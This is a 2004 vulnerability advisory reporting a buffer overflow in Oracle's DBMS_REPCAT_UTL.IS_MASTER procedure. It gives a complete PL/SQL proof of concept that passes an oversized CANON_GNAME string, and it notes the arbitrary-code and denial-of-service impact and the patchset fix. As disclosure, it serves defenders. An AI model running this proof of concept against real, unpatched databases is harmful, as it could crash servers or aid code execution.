|
#39 - Buffer overflow in procedure IS_MASTER of DBMS_REPCAT_UTL package
August 31, 2004
Credit: These vulnerabilities were researched and discovered by Esteban Martínez Fayó of Application Security, Inc.
Risk level: Low
Details:
When IS_MASTER procedure is called with a long string in the CANON_GNAME parameter a buffer overflow occurs.
To reproduce the overflow, execute the next PL/SQL:
DECLARE
RET_VALUE_X123 BOOLEAN;
P_CANON_GOWNER VARCHAR2(32767);
P_CANON_GNAME VARCHAR2(32767);
P_MASTER VARCHAR2(32767);
AAA VARCHAR2(32767);
BEGIN
AAA:='A';
AAA:=AAA || AAA;
AAA:=AAA || AAA;
AAA:=AAA || AAA;
AAA:=AAA || AAA;
AAA:=AAA || AAA;
AAA:=AAA || AAA;
AAA:=AAA || AAA;
AAA:=AAA || AAA;
AAA:=AAA || AAA;
AAA:=AAA || AAA;
AAA:=AAA || AAA;
AAA:=AAA || AAA;
AAA:=AAA || AAA;
AAA:=AAA || AAA;
P_CANON_GOWNER := '';
P_CANON_GNAME := AAA;
P_MASTER := '';
RET_VALUE_X123 := SYS.DBMS_REPCAT_UTL.IS_MASTER(CANON_GOWNER => P_CANON_GOWNER,CANON_GNAME => P_CANON_GNAME, MASTER => P_MASTER);
END;
Analysis:
This vulnerability can be exploited by members of SYSDBA role and users granted execute permissions on DBMS_REPCAT_UTL package.
Exploitation of this vulnerability allows an attacker to execute arbitrary code. It can also be exploited to cause DOS (Denial of service) killing Oracle server process.
Vendor Fix:
Fixed in Patchset 4 (9.2.0.5). 10g Not vulnerable.
|
